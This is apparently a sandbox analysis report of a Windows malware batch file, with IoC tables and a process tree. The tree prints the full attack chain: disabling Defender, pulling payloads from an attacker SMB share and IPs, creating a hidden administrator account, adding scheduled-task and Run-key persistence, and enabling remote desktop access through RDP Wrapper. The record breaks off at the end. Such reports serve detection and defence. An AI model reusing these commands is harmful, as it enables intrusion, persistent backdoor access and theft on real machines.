1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1244	powershell.exe
1244	powershell.exe
3648	svchost.exe
3648	svchost.exe
3648	svchost.exe
3648	svchost.exe
2020	svchost.exe
2020	svchost.exe
2020	svchost.exe
2020	svchost.exe
1780	svchost.exe
1780	svchost.exe
1780	svchost.exe
1780	svchost.exe
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
1292	svchost.exe
1292	svchost.exe
1292	svchost.exe
1292	svchost.exe
5072	svchost.exe
5072	svchost.exe

Suspicious behavior: LoadsDriver 9 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4384	wmic.exe
Token: SeIncreaseQuotaPrivilege	4384	wmic.exe
Token: SeSecurityPrivilege	4384	wmic.exe
Token: SeTakeOwnershipPrivilege	4384	wmic.exe
Token: SeLoadDriverPrivilege	4384	wmic.exe
Token: SeSystemtimePrivilege	4384	wmic.exe
Token: SeBackupPrivilege	4384	wmic.exe
Token: SeRestorePrivilege	4384	wmic.exe
Token: SeShutdownPrivilege	4384	wmic.exe
Token: SeSystemEnvironmentPrivilege	4384	wmic.exe
Token: SeUndockPrivilege	4384	wmic.exe
Token: SeManageVolumePrivilege	4384	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4384	wmic.exe
Token: SeIncreaseQuotaPrivilege	4384	wmic.exe
Token: SeSecurityPrivilege	4384	wmic.exe
Token: SeTakeOwnershipPrivilege	4384	wmic.exe
Token: SeLoadDriverPrivilege	4384	wmic.exe
Token: SeSystemtimePrivilege	4384	wmic.exe
Token: SeBackupPrivilege	4384	wmic.exe
Token: SeRestorePrivilege	4384	wmic.exe
Token: SeShutdownPrivilege	4384	wmic.exe
Token: SeSystemEnvironmentPrivilege	4384	wmic.exe
Token: SeUndockPrivilege	4384	wmic.exe
Token: SeManageVolumePrivilege	4384	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1432	wmic.exe
Token: SeIncreaseQuotaPrivilege	1432	wmic.exe
Token: SeSecurityPrivilege	1432	wmic.exe
Token: SeTakeOwnershipPrivilege	1432	wmic.exe
Token: SeLoadDriverPrivilege	1432	wmic.exe
Token: SeSystemtimePrivilege	1432	wmic.exe
Token: SeBackupPrivilege	1432	wmic.exe
Token: SeRestorePrivilege	1432	wmic.exe
Token: SeShutdownPrivilege	1432	wmic.exe
Token: SeSystemEnvironmentPrivilege	1432	wmic.exe
Token: SeUndockPrivilege	1432	wmic.exe
Token: SeManageVolumePrivilege	1432	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1432	wmic.exe
Token: SeIncreaseQuotaPrivilege	1432	wmic.exe
Token: SeSecurityPrivilege	1432	wmic.exe
Token: SeTakeOwnershipPrivilege	1432	wmic.exe
Token: SeLoadDriverPrivilege	1432	wmic.exe
Token: SeSystemtimePrivilege	1432	wmic.exe
Token: SeBackupPrivilege	1432	wmic.exe
Token: SeRestorePrivilege	1432	wmic.exe
Token: SeShutdownPrivilege	1432	wmic.exe
Token: SeSystemEnvironmentPrivilege	1432	wmic.exe
Token: SeUndockPrivilege	1432	wmic.exe
Token: SeManageVolumePrivilege	1432	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4772	wmic.exe
Token: SeIncreaseQuotaPrivilege	4772	wmic.exe
Token: SeSecurityPrivilege	4772	wmic.exe
Token: SeTakeOwnershipPrivilege	4772	wmic.exe
Token: SeLoadDriverPrivilege	4772	wmic.exe
Token: SeSystemtimePrivilege	4772	wmic.exe
Token: SeBackupPrivilege	4772	wmic.exe
Token: SeRestorePrivilege	4772	wmic.exe
Token: SeShutdownPrivilege	4772	wmic.exe
Token: SeSystemEnvironmentPrivilege	4772	wmic.exe
Token: SeUndockPrivilege	4772	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4908 wrote to memory of 1352	4908	cmd.exe	85
PID 4908 wrote to memory of 1352	4908	cmd.exe	85
PID 4908 wrote to memory of 4100	4908	cmd.exe	86
PID 4908 wrote to memory of 4100	4908	cmd.exe	86
PID 4100 wrote to memory of 4904	4100	cmd.exe	87
PID 4100 wrote to memory of 4904	4100	cmd.exe	87
PID 4908 wrote to memory of 4424	4908	cmd.exe	96
PID 4908 wrote to memory of 4424	4908	cmd.exe	96
PID 4908 wrote to memory of 4424	4908	cmd.exe	96
PID 4908 wrote to memory of 1288	4908	cmd.exe	105
PID 4908 wrote to memory of 1288	4908	cmd.exe	105
PID 4908 wrote to memory of 3960	4908	cmd.exe	106
PID 4908 wrote to memory of 3960	4908	cmd.exe	106
PID 4908 wrote to memory of 2556	4908	cmd.exe	107
PID 4908 wrote to memory of 2556	4908	cmd.exe	107
PID 4908 wrote to memory of 3024	4908	cmd.exe	108
PID 4908 wrote to memory of 3024	4908	cmd.exe	108
PID 4908 wrote to memory of 3588	4908	cmd.exe	109
PID 4908 wrote to memory of 3588	4908	cmd.exe	109
PID 3588 wrote to memory of 3956	3588	net.exe	110
PID 3588 wrote to memory of 3956	3588	net.exe	110
PID 4908 wrote to memory of 3516	4908	cmd.exe	111
PID 4908 wrote to memory of 3516	4908	cmd.exe	111
PID 3516 wrote to memory of 640	3516	net.exe	112
PID 3516 wrote to memory of 640	3516	net.exe	112
PID 4908 wrote to memory of 3064	4908	cmd.exe	113
PID 4908 wrote to memory of 3064	4908	cmd.exe	113
PID 3064 wrote to memory of 904	3064	net.exe	114
PID 3064 wrote to memory of 904	3064	net.exe	114
PID 4908 wrote to memory of 4068	4908	cmd.exe	115
PID 4908 wrote to memory of 4068	4908	cmd.exe	115
PID 4908 wrote to memory of 912	4908	cmd.exe	116
PID 4908 wrote to memory of 912	4908	cmd.exe	116
PID 912 wrote to memory of 852	912	net.exe	117
PID 912 wrote to memory of 852	912	net.exe	117
PID 4908 wrote to memory of 1688	4908	cmd.exe	118
PID 4908 wrote to memory of 1688	4908	cmd.exe	118
PID 1688 wrote to memory of 4920	1688	net.exe	119
PID 1688 wrote to memory of 4920	1688	net.exe	119
PID 2696 wrote to memory of 4384	2696	MeshAgent.exe	120
PID 2696 wrote to memory of 4384	2696	MeshAgent.exe	120
PID 2696 wrote to memory of 4384	2696	MeshAgent.exe	120
PID 4908 wrote to memory of 3580	4908	cmd.exe	122
PID 4908 wrote to memory of 3580	4908	cmd.exe	122
PID 2696 wrote to memory of 1432	2696	MeshAgent.exe	123
PID 2696 wrote to memory of 1432	2696	MeshAgent.exe	123
PID 2696 wrote to memory of 1432	2696	MeshAgent.exe	123
PID 4908 wrote to memory of 4512	4908	cmd.exe	125
PID 4908 wrote to memory of 4512	4908	cmd.exe	125
PID 4908 wrote to memory of 1200	4908	cmd.exe	126
PID 4908 wrote to memory of 1200	4908	cmd.exe	126
PID 2696 wrote to memory of 4772	2696	MeshAgent.exe	127
PID 2696 wrote to memory of 4772	2696	MeshAgent.exe	127
PID 2696 wrote to memory of 4772	2696	MeshAgent.exe	127
PID 4908 wrote to memory of 2460	4908	cmd.exe	128
PID 4908 wrote to memory of 2460	4908	cmd.exe	128
PID 4908 wrote to memory of 4988	4908	cmd.exe	130
PID 4908 wrote to memory of 4988	4908	cmd.exe	130
PID 4908 wrote to memory of 4424	4908	cmd.exe	131
PID 4908 wrote to memory of 4424	4908	cmd.exe	131
PID 4908 wrote to memory of 1456	4908	cmd.exe	132
PID 4908 wrote to memory of 1456	4908	cmd.exe	132
PID 4908 wrote to memory of 768	4908	cmd.exe	133
PID 4908 wrote to memory of 768	4908	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4076	attrib.exe
2504	attrib.exe
3528	attrib.exe
2156	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- C:\Windows\system32\cmd.exe
  cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4100
- - C:\Windows\system32\net.exe
    net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
    3⤵
    PID:4904
- \??\UNC\45.139.196.250\shear\s.exe
  \\45.139.196.250\shear\s.exe -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'c:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3024
- C:\Windows\system32\net.exe
  net user t1 Raed12346@@ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 Raed12346@@ /add
    3⤵
    PID:3956
- C:\Windows\system32\net.exe
  net localgroup administrators t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators t1 /add
    3⤵
    PID:640
- C:\Windows\system32\net.exe
  net localgroup Administratörer t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administratörer t1 /add
    3⤵
    PID:904
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:4068
- C:\Windows\system32\net.exe
  net user t1 /active:no
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:no
    3⤵
    PID:852
- C:\Windows\system32\net.exe
  net user t1 /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:yes
    3⤵
    PID:4920
- C:\Windows\system32\ReAgentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:3580
- C:\Windows\system32\reg.exe
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
  2⤵
  PID:4512
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1200
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2460
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:4988
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:4424
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
  2⤵
  PID:1456
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:768
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3720
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:1944
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
  2⤵
  PID:1420
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:3272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5112
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:4076
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata\*.*
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2504
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:3528
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2556
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5008
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2340
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
  2⤵
  - Adds Run key to start application
  PID:3872
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
  2⤵
  - Adds Run key to start application
  PID:3564
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2156
- C:\Windows\system32\cmd.exe
  cmd /C C:\ProgramData\Windata\installer.bat
  2⤵
  - Drops file in Program Files directory
  PID:2268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4572
- - C:\Windows\system32\cmd.exe
    cmd /C C:\ProgramData\Windata\hrdp\install.bat
    3⤵
    PID:556
  - - C:\ProgramData\Windata\hrdp\RDPWInst.exe
      "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in System32 directory
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:5040
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "update.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1244
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
    3⤵
    - Drops file in Program Files directory
    PID:4376
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:3904
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2552
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4856
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:5112
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1488
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:556
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4444
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3360
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:812
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1908
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
    3⤵
    - Drops file in Program Files directory
    PID:4552
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:4472
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      PID:4992
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2696
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:4928
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3252
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:5008
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2720
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:812
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4648
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3516
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2448
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1800
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:964
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1900
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3988
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
    3⤵
    PID:3328
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:4440
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4800
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
    3⤵
    - Drops file in Program Files directory
    PID:2460
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:632
  - - C:\Windows\system32\sc.exe
      sc queryex "TermService"
      4⤵
      Launches sc.exe
      PID:4076
  - - C:\Windows\system32\find.exe
      find "STATE"
      4⤵
      PID:4068
  - - C:\Windows\system32\find.exe
      find /v "RUNNING"
      4⤵
      PID:4528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c query session rdp-tcp
      4⤵
      PID:1696
    - - C:\Windows\system32\query.exe
        
        query session rdp-tcp
        5⤵
        
        PID:2504
      - C:\Windows\system32\qwinsta.exe
        
        "C:\Windows\system32\qwinsta.exe" rdp-tcp
        6⤵
        
        PID:1320
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
      4⤵
      Server Software Component: Terminal Services DLL
      PID:2468
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4928
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2452
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:1900
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4272
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:4108
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:1944
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
      4⤵
      PID:1668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
      4⤵
      PID:3156
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        
        PID:1736
  - - C:\Windows\system32\cmd.exe
